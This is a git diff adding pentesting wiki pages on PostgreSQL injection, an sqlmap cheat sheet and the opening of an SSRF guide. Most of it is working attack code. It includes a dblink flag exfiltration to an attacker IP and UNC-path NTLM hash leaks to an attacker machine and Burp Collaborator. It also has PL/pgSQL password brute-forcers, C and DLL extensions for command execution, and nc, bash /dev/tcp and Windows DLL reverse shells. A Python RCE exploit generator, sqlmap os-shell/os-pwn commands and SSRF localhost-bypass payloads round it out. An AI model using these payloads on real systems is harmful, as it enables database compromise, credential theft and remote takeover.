+    0x0030:  3954 cd3e 0000 1c94 0003 0000 7573 6572  9T.>........user
+    0x0040:  0031 3635 3731 3a31 3634 3339 3a31 3635  .16571:16439:165
+    0x0050:  3732 3a31 3634 3431 3a31 3634 3432 3a31  72:16441:16442:1
+    0x0060:  3733 3732 3a31 3634 3434 3a31 3634 3435  7372:16444:16445
+    0x0070:  3a31 3831 3534 3a31 3733 3830 3a31 3737  :18154:17380:177
+    0x0080:  3038 3a31 3635 3737 3a31 3634 3530 3a31  08:16577:16450:1
+    0x0090:  3634 3531 3a31 3634 3532 3a31 3634 3533  6451:16452:16453
+
+.....
+.....
+.....
+```
+
+We got a bunch of `oid`s. We can try using `lo_get` to load object's content. For example, `lo_get(16439)` will load the content of `/etc/passwd`. Because the result of `lo_gets` is `bytea`, we need to convert it to `UTF8` so that it can be appended in the query.
+
+We can try to load some objects with lowest `oid` to find out if the flag file has been loaded before. The flag file object does exist with `oid` 16444. There are no whitespaces in the flag so we can just display it as is.
+
+To load the flag:
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=p
+```
+
+#### More info of oid:
+
+* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/\#hr\_admin\_module](https://balsn.tw/ctf_writeup/20190603-facebookctf/#hr_admin_module)
+* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
new file mode 100644
index 00000000..dab87274
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -0,0 +1,108 @@
+# Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
+
+Since **PostgreSQL 9.1**, installation of additional modules is simple. [Registered extensions like `dblink`](https://www.postgresql.org/docs/current/contrib.html) can be installed with [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html):
+
+```sql
+CREATE EXTENSION dblink;
+```
+
+Once you have dblink loaded you could be able to perform some interesting tricks:
+
+### Privilege Escalation
+
+The file `pg_hba.conf` could be bad configured **allowing connections** from **localhost as any user** without needing to know the password. This file could be typically found in `/etc/postgresql/12/main/pg_hba.conf` and a bad configuration looks like:
+
+```text
+local    all    all    trust
+```
+
+_Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it.  
+Note also that the file pg\_hba.conf is readable only by postgres user and group and writable only by postgres user._
+
+This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.
+
+Another possible misconfiguration consist on something like this:
+
+```text
+host    all     all     127.0.0.1/32    trust
+```
+
+As it will allow everybody from the localhost to connect to the database as any user.  
+In this case and if the **`dblink`** function is **working**, you could **escalate privileges** by connecting to the database through an already established connection and access data shouldn't be able to access:
+
+```sql
+SELECT * FROM dblink('host=127.0.0.1
+                          user=postgres
+                          dbname=postgres',
+                         'SELECT datname FROM pg_database')
+                      RETURNS (result TEXT);
+
+SELECT * FROM dblink('host=127.0.0.1
+                          user=postgres
+                          dbname=postgres',
+                         'select usename, passwd from pg_shadow')
+                      RETURNS (result1 TEXT, result2 TEXT);
+```
+
+**Find** [**more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.**
+
+### Port Scanning
+
+Abusing `dblink_connect` you could also **search open ports**. If that **function doesn't work you should try to use `dblink_connect_u()`** as the documentation says that  _`dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method_.
+
+```sql
+SELECT * FROM dblink_connect('host=216.58.212.238
+                                  port=443
+                                  user=name
+                                  password=secret
+                                  dbname=abc
+                                  connect_timeout=10');
+//Different response
+// Port closed
+RROR:  could not establish connection
+DETAIL:  could not connect to server: Connection refused
+	Is the server running on host "127.0.0.1" and accepting
+	TCP/IP connections on port 4444?
+
+// Port Filtered/Timeout
+ERROR:  could not establish connection
+DETAIL:  timeout expired
+
+// Accessing HTTP server
+ERROR:  could not establish connection
+DETAIL:  timeout expired
+
+// Accessing HTTPS server
+ERROR:  could not establish connection
+DETAIL:  received invalid response to SSL negotiation:
+```
+
+Note that **before** being able to use `dblink_connect` or `dblink_connect_u` you may need to execute:
+
+```text
+CREATE extension dblink;
+```
+
+### UNC path - NTLM hash disclosure
+
+```sql
+-- can be used to leak hashes to Responder/equivalent
+CREATE TABLE test();
+COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
+```
+
+```sql
+-- to extract the value of user and send it to Burp Collaborator
+CREATE TABLE test(retval text);
+CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ 
+DECLARE sqlstring TEXT;
+DECLARE userval TEXT;
+BEGIN 
+SELECT INTO userval (SELECT user);
+sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
+EXECUTE sqlstring;
+END;
+$$ LANGUAGE plpgsql SECURITY DEFINER;
+SELECT testfunc();
+```
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
new file mode 100644
index 00000000..1dfbd118
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -0,0 +1,110 @@
+# PL/pgSQL Password Bruteforce
+
+PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.
+
+You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:
+
+```sql
+SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
+     lanname | lanacl
+    ---------+---------
+     plpgsql |
+```
+
+By default, **creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
+
+```sql
+REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
+```
+
+In that case, our previous query would output different results:
+
+```sql
+SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
+     lanname | lanacl
+    ---------+-----------------
+     plpgsql | {admin=U/admin}
+```
+
+Here how you could perform a 4 chars password bruteforce:
+
+```sql
+//Create the brute-force function
+CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
+                                username TEXT, dbname TEXT) RETURNS TEXT AS
+$$
+DECLARE
+    word TEXT;
+BEGIN
+    FOR a IN 65..122 LOOP
+        FOR b IN 65..122 LOOP
+            FOR c IN 65..122 LOOP
+                FOR d IN 65..122 LOOP
+                    BEGIN
+                        word := chr(a) || chr(b) || chr(c) || chr(d);
+                        PERFORM(SELECT * FROM dblink(' host=' || host ||
+                                                    ' port=' || port ||
+                                                    ' dbname=' || dbname ||
+                                                    ' user=' || username ||
+                                                    ' password=' || word,
+                                                    'SELECT 1') 
+                                                    RETURNS (i INT));
+                                                    RETURN word;
+                        EXCEPTION
+                            WHEN sqlclient_unable_to_establish_sqlconnection 
+                                THEN
+                                    -- do nothing
+                    END;
+                END LOOP;
+            END LOOP;
+        END LOOP;
+    END LOOP;
+    RETURN NULL;
+END;
+$$ LANGUAGE 'plpgsql';
+
+//Call the function
+select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
+```
+
+_Note that even brute-forcing 4 characters may take several minutes._
+
+You could also **download a wordlist** and try only those passwords \(dictionary attack\):
+
+```sql
+//Create the function
+CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
+                                username TEXT, dbname TEXT) RETURNS TEXT AS
+$$
+BEGIN
+    FOR word IN (SELECT word FROM dblink('host=1.2.3.4
+                                            user=name
+                                            password=qwerty
+                                            dbname=wordlists',
+                                            'SELECT word FROM wordlist')
+                                        RETURNS (word TEXT)) LOOP
+        BEGIN
+            PERFORM(SELECT * FROM dblink(' host=' || host ||
+                                            ' port=' || port ||
+                                            ' dbname=' || dbname ||
+                                            ' user=' || username ||
+                                            ' password=' || word,
+                                            'SELECT 1')
+                                        RETURNS (i INT));
+            RETURN word;
+
+            EXCEPTION
+                WHEN sqlclient_unable_to_establish_sqlconnection THEN
+                    -- do nothing
+        END;
+    END LOOP;
+    RETURN NULL;
+END;
+$$ LANGUAGE 'plpgsql'
+
+//Call the function
+select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
+```
+
+**Find**[ **more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.**
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
new file mode 100644
index 00000000..d79e9f8a
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -0,0 +1,289 @@
+# RCE with PostgreSQL Extensions
+
+## PostgreSQL Extensions
+
+PostgreSQL is designed to be easily extensible. For this reason, extensions loaded into the database can function just like features that are built in.  
+Extensions are modules that supply extra functions, operators, or types. They are libraries written in C.  
+From PostgreSQL &gt; 8.1 the extension libraries must be compiled with a especial header or PostgreSQL will refuse to execute them.
+
+Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)\*\*\*\*
+
+### RCE in Linux
+
+The process for executing system commands from PostgreSQL 8.1 and before is straightforward and well documented \([Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload)\):
+
+```c
+CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
+SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
+```
+
+However, when attempted on PostgreSQL 9.0, the following error was shown:
+
+```c
+ERROR:  incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block
+HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
+```
+
+This error is explained in the [PostgreSQL documentation](https://www.postgresql.org/docs/current/static/xfunc-c.html):
+
+> To ensure that a dynamically loaded object file is not loaded into an incompatible server, PostgreSQL checks that the file contains a “magic block” with the appropriate contents. This allows the server to detect obvious incompatibilities, such as code compiled for a different major version of PostgreSQL. A magic block is required as of PostgreSQL 8.2. To include a magic block, write this in one \(and only one\) of the module source files, after having included the header fmgr.h:
+>
+> `#ifdef PG_MODULE_MAGIC  
+> PG_MODULE_MAGIC;  
+> #endif`
+
+So for PostgreSQL versions since 8.2, an attacker either needs to take advantage of a library already present on the system, or upload their own library, which has been compiled against the right major version of PostgreSQL, and includes this magic block.
+
+#### Compile the library
+
+First of all you need to know the version of PostgreSQL running:
+
+```bash
+SELECT version();
+PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
+```
+
+The major versions have to match, so in this case compiling a library using any 9.6.x should work.  
+Then install that version in your system:
+
+```bash
+apt install postgresql postgresql-server-dev-9.6
+```
+
+And compile the library:
+
+```c
+//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
+#include <string.h>
+#include "postgres.h"
+#include "fmgr.h"
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+PG_FUNCTION_INFO_V1(pg_exec);
+Datum pg_exec(PG_FUNCTION_ARGS) {
+    char* command = PG_GETARG_CSTRING(0);
+    PG_RETURN_INT32(system(command));
+}
+```
+
+Then upload the compiled library and execute commands with:
+
+```bash
+CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;
+SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
+#Notice the double single quotes are needed to scape the qoutes
+```
+
+You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** \(if you have PostgreSQL access\) with:
+
+{% embed url="https://github.com/Dionach/pgexec" %}
+
+For more information read: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
+
+### RCE in Windows
+
+The following DLL takes as input the **name of the binary** and the **number** of **times** you want to execute it and executes it:
+
+```c
+#include "postgres.h"
+#include <string.h>
+#include "fmgr.h"
+#include "utils/geo_decls.h"
+#include <stdio.h>
+#include "utils/builtins.h"
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+/* Add a prototype marked PGDLLEXPORT */
+PGDLLEXPORT Datum pgsql_exec(PG_FUNCTION_ARGS);
+PG_FUNCTION_INFO_V1(pgsql_exec);
+
+/* this function launches the executable passed in as the first parameter
+in a FOR loop bound by the second parameter that is also passed*/
+Datum
+pgsql_exec(PG_FUNCTION_ARGS)
+{
+	/* convert text pointer to C string */
+#define GET_STR(textp) DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
+
+	/* retrieve the second argument that is passed to the function (an integer)
+	that will serve as our counter limit*/
+
+	int instances = PG_GETARG_INT32(1);
+
+	for (int c = 0; c < instances; c++) {
+		/*launch the process passed in the first parameter*/
+		ShellExecute(NULL, "open", GET_STR(PG_GETARG_TEXT_P(0)), NULL, NULL, 1);
+	}
+	PG_RETURN_VOID();
+}
+```
+
+You can find the DLL compiled in this zip:
+
+{% file src="../../../.gitbook/assets/pgsql\_exec.zip" %}
+
+You can indicate to this DLL **which binary to execute** and the number of time to execute it, in this example it will execute `calc.exe` 2 times:
+
+```bash
+CREATE OR REPLACE FUNCTION remote_exec(text, integer) RETURNS void AS '\\10.10.10.10\shared\pgsql_exec.dll', 'pgsql_exec' LANGUAGE C STRICT;
+SELECT remote_exec('calc.exe', 2);
+DROP FUNCTION remote_exec(text, integer);
+```
+
+In [**here** ](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html)you can find this reverse-shell:
+
+```c
+#define PG_REVSHELL_CALLHOME_SERVER "10.10.10.10"
+#define PG_REVSHELL_CALLHOME_PORT "4444"
+ 
+#include "postgres.h"
+#include <string.h>
+#include "fmgr.h"
+#include "utils/geo_decls.h"
+#include <winsock2.h>
+ 
+#pragma comment(lib,"ws2_32")
+ 
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+ 
+#pragma warning(push)
+#pragma warning(disable: 4996)
+#define _WINSOCK_DEPRECATED_NO_WARNINGS
+ 
+BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
+                    _In_ DWORD fdwReason,
+                    _In_ LPVOID lpvReserved)
+{
+    WSADATA wsaData;
+    SOCKET wsock;
+    struct sockaddr_in server;
+    char ip_addr[16];
+    STARTUPINFOA startupinfo;
+    PROCESS_INFORMATION processinfo;
+ 
+    char *program = "cmd.exe";
+    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
+    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
+ 
+    WSAStartup(MAKEWORD(2, 2), &wsaData);
+    wsock = WSASocket(AF_INET, SOCK_STREAM,
+                      IPPROTO_TCP, NULL, 0, 0);
+ 
+    struct hostent *host;
+    host = gethostbyname(ip);
+    strcpy_s(ip_addr, sizeof(ip_addr),
+             inet_ntoa(*((struct in_addr *)host->h_addr)));
+ 
+    server.sin_family = AF_INET;
+    server.sin_port = htons(port);
+    server.sin_addr.s_addr = inet_addr(ip_addr);
+ 
+    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
+              NULL, NULL, NULL, NULL);
+ 
+    memset(&startupinfo, 0, sizeof(startupinfo));
+    startupinfo.cb = sizeof(startupinfo);
+    startupinfo.dwFlags = STARTF_USESTDHANDLES;
+    startupinfo.hStdInput = startupinfo.hStdOutput =
+                            startupinfo.hStdError = (HANDLE)wsock;
+ 
+    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
+                  NULL, NULL, &startupinfo, &processinfo);
+ 
+    return TRUE;
+}
+ 
+#pragma warning(pop) /* re-enable 4996 */
+ 
+/* Add a prototype marked PGDLLEXPORT */
+PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
+ 
+PG_FUNCTION_INFO_V1(add_one);
+ 
+Datum dummy_function(PG_FUNCTION_ARGS)
+{
+    int32 arg = PG_GETARG_INT32(0);
+ 
+    PG_RETURN_INT32(arg + 1);
+}
+```
+
+Note how in this case the **malicious code is inside the DllMain function**. This means that in this case it isn't necessary to execute the loaded function in postgresql, just **loading the DLL** will **execute** the reverse shell:
+
+```c
+CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
+```
+
+### RCE in newest Prostgres versions
+
+On the **latest versions** of PostgreSQL, the `superuser` is **no** longer **allowed** to **load** a shared library file from **anywhere** else besides `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix. Additionally, this path is **not writable** by either the NETWORK\_SERVICE or postgres accounts.
+
+However, an authenticated database `superuser` **can write** binary files to the file-system using “large objects” and can of course write to the `C:\Program Files\PostgreSQL\11\data` directory. The reason for this should be clear, for updating/creating tables in the database.
+
+The underlying issue is that the `CREATE FUNCTION` operative **allows for a directory traversal** to the data directory! So essentially, an authenticated attacker can **write a shared library file into the data directory and use the traversal to load the shared library**. This means an attacker can get native code execution and as such, execute arbitrary code.
+
+#### Attack flow
+
+First of all you need to **use large objects to upload the dll**. You can see how to do that here:
+
+{% page-ref page="big-binary-files-upload-postgresql.md" %}
+
+Once you have uploaded the extension \(with the name of poc.dll for this example\) to the data directory you can load it with:
+
+```c
+create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
+select connect_back('192.168.100.54', 1234);
+```
+
+_Note that you don't need to append the `.dll` extension as the create function will add it._
+
+For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**  
+In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) ****\(_to learn how to compile a postgres extension read any of the previous versions_\).  
+In the same page this **exploit to automate** this technique was given:
+
+```python
+#!/usr/bin/env python3
+import sys
+
+if len(sys.argv) != 4:
+    print("(+) usage %s <connectback> <port> <dll/so>" % sys.argv[0])
+    print("(+) eg: %s 192.168.100.54 1234 si-x64-12.dll" % sys.argv[0])
+    sys.exit(1)
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+lib = sys.argv[3]
+with open(lib, "rb") as dll:
+    d = dll.read()
+sql = "select lo_import('C:/Windows/win.ini', 1337);"
+for i in range(0, len(d)//2048):
+    start = i * 2048
+    end   = (i+1) * 2048
+    if i == 0:
+        sql += "update pg_largeobject set pageno=%d, data=decode('%s', 'hex') where loid=1337;" % (i, d[start:end].hex())
+    else:
+        sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % (i, d[start:end].hex())
+if (len(d) % 2048) != 0:
+    end   = (i+1) * 2048
+    sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % ((i+1), d[end:].hex())
+
+sql += "select lo_export(1337, 'poc.dll');"
+sql += "create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;"
+sql += "select connect_back('%s', %d);" % (host, port)
+print("(+) building poc.sql file")
+with open("poc.sql", "w") as sqlfile:
+    sqlfile.write(sql)
+print("(+) run poc.sql in PostgreSQL using the superuser")
+print("(+) for a db cleanup only, run the following sql:")
+print("    select lo_unlink(l.oid) from pg_largeobject_metadata l;")
+print("    drop function connect_back(text, integer);")
+```
+
diff --git a/pentesting-web/sql-injection/sqlmap.md b/pentesting-web/sql-injection/sqlmap.md
new file mode 100644
index 00000000..43859567
--- /dev/null
+++ b/pentesting-web/sql-injection/sqlmap.md
@@ -0,0 +1,192 @@
+# SQLMap - Cheetsheat
+
+## Basic arguments for SQLmap
+
+### Generic
+
+```bash
+-u "<URL>" 
+-p "<PARAM TO TEST>" 
+--user-agent=SQLMAP 
+--random-agent 
+--threads=10 
+--risk=3 #MAX
+--level=5 #MAX
+--dbms="<KNOWN DB TECH>" 
+--os="<OS>"
+--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
+--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
+--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
+--proxy=PROXY
+```
+
+### Retrieve Information
+
+#### Internal
+
+```bash
+--current-user #Get current user
+--is-dba #Check if current user is Admin
+--hostname #Get hostname
+--users #Get usernames od DB
+--passwords #Get passwords of users in DB
+```
+
+#### DB data
+
+```bash
+--all #Retrieve everything
+--dump #Dump DBMS database table entries
+--dbs #Names of the available databases
+--tables #Tables of a database ( -D <DB NAME> )
+--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
+-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
+```
+
+## Injection place
+
+### From Burp/ZAP capture
+
+Capture the request and create a req.txt file
+
+```bash
+sqlmap -r req.txt --current-user
+```
+
+### GET Request Injection
+
+```bash
+sqlmap -u "http://example.com/?id=1" -p id
+sqlmap -u "http://example.com/?id=*" -p id
+```
+
+### POST Request Injection
+
+```bash
+sqlmap -u "http://example.com" --data "username=*&password=*"
+```
+
+### Injections in Headers and other HTTP Methods
+
+```bash
+#Inside cookie
+sqlmap  -u "http://example.com" --cookie "mycookies=*"
+
+#Inside some header
+sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
+sqlmap -u "http://example.com" --headers="referer:*"
+
+#PUT Method
+sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
+
+#The injection is located at the '*'
+```
+
+### Second order injection
+
+```bash
+python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
+sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
+```
+
+### Shell
+
+```bash
+#Exec command
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
+
+#Simple Shell
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
+
+#Dropping a reverse-shell / meterpreter
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
+```
+
+### Crawl a website with SQLmap and auto-exploit
+
+```bash
+sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
+
+--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--crawl = how deep you want to crawl a site
+--forms = Parse and test forms
+```
+
+## Customizing Injection
+
+### Set a suffix
+
+```bash
+python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
+```
+
+### Prefix
+
+```bash
+python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
+```
+
+### Help finding boolean injection
+
+```bash
+# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
+sqlmap -r r.txt -p id --not-string ridiculous --batch
+```
+
+### Tamper
+
+```bash
+--tamper=name_of_the_tamper
+#In kali you can see all the tampers in /usr/share/sqlmap/tamper
+```
+
+| Tamper | Description |
+| :--- | :--- |
+| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
+| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
+| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
+| base64encode.py | Base64 all characters in a given payload |
+| between.py | Replaces greater than operator \('&gt;'\) with 'NOT BETWEEN 0 AND \#' |
+| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
+| chardoubleencode.py | Double url-encodes all characters in a given payload \(not processing already encoded\) |
+| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
+| commalessmid.py | Replaces instances like 'MID\(A, B, C\)' with 'MID\(A FROM B FOR C\)' |
+| concat2concatws.py | Replaces instances like 'CONCAT\(A, B\)' with 'CONCAT\_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' |
+| charencode.py | Url-encodes all characters in a given payload \(not processing already encoded\) |
+| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "%u0022" |
+| charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "\u0022" |
+| equaltolike.py | Replaces all occurances of operator equal \('='\) with operator 'LIKE' |
+| escapequotes.py | Slash escape quotes \(' and "\) |
+| greatest.py | Replaces greater than operator \('&gt;'\) with 'GREATEST' counterpart |
+| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
+| ifnull2ifisnull.py | Replaces instances like 'IFNULL\(A, B\)' with 'IF\(ISNULL\(A\), B, A\)' |
+| modsecurityversioned.py | Embraces complete query with versioned comment |
+| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
+| multiplespaces.py | Adds multiple spaces around SQL keywords |
+| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement \(e.g. .replace\("SELECT", ""\)\) filters |
+| percentage.py | Adds a percentage sign \('%'\) infront of each character |
+| overlongutf8.py | Converts all characters in a given payload \(not processing already encoded\) |
+| randomcase.py | Replaces each keyword character with random case value |
+| randomcomments.py | Add random comments to SQL keywords |
+| securesphere.py | Appends special crafted string |
+| sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs |
+| space2comment.py | Replaces space character \(' '\) with comments |
+| space2dash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a random string and a new line \('\n'\) |
+| space2hash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) |
+| space2morehash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) |
+| space2mssqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| space2mssqlhash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a new line \('\n'\) |
+| space2mysqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| space2mysqldash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a new line \('\n'\) |
+| space2plus.py | Replaces space character \(' '\) with plus \('+'\) |
+| space2randomblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts \(&& and |
+| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
+| unmagicquotes.py | Replaces quote character \('\) with a multi-byte combo %bf%27 together with generic comment at the end \(to make it work\) |
+| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
+| varnish.py | Append a HTTP header 'X-originating-IP' |
+| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
+| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
+| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
+
diff --git a/pentesting-web/ssrf-server-side-request-forgery.md b/pentesting-web/ssrf-server-side-request-forgery.md
new file mode 100644
index 00000000..dee6c56e
--- /dev/null
+++ b/pentesting-web/ssrf-server-side-request-forgery.md
@@ -0,0 +1,461 @@
+# SSRF \(Server Side Request Forgery\)
+
+## What is Server Side Request Forgery?
+
+Server-side request forgery \(also known as SSRF\) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. \(From [here](https://portswigger.net/web-security/ssrf)\)
+
+## What you should try to do
+
+* Accessing to **local files** \(file://\)
+* Trying to access to **local IP**
+  * Local **IP bypass**
+  * **DNS spoofing** \(domains pointing to 127.0.0.1\)
+  * **DNS Rebinding** \(resolves to an IP and next time to a local IP: [http://rbnd.gl0.eu/dnsbin](http://rbnd.gl0.eu/dnsbin)\). This is useful to bypass configurations which resolves the given domain and check it against a white-list and then try to access it again \(as it has to resolve the domain again a different IP can be served by the DNS\). More [info here](https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/).
+* Trying to make an **internal assets discovery and internal port scan**.
+* Accessing **private content** \(filtered by IP or only accessible locally, like _/admin_ path\).
+
+## Bypass restrictions
+
+### Basic bypass localhost
+
+```bash
+## Localhost
+http://127.0.0.1:80
+http://127.0.0.1:443
+http://127.0.0.1:22
+http://127.1:80
+http://0.0.0.0:80
+http://localhost:80
+http://[::]:80/
+http://[::]:25/ SMTP
+http://[::]:3128/ Squid
+http://[0000::1]:80/
+http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
+http://①②⑦.⓪.⓪.⓪
+
+## CDIR bypass
+http://127.127.127.127
+http://127.0.1.3
+http://127.0.0.0
+
+## Decimal bypass
+http://2130706433/ = http://127.0.0.1
+http://017700000001 = http://127.0.0.1
+http://3232235521/ = http://192.168.0.1
+http://3232235777/ = http://192.168.1.1
+```
+
+### Bypass using DNS -&gt; localhost
+
+```bash
+localtest.me = 127.0.0.1
+customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
+mail.ebc.apple.com = 127.0.0.6 (localhost)
+127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
+www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
+http://customer1.app.localhost.my.company.127.0.0.1.nip.io
+http://bugbounty.dod.network = 127.0.0.2 (localhost)
+1ynrnhl.xip.io == 169.254.169.254
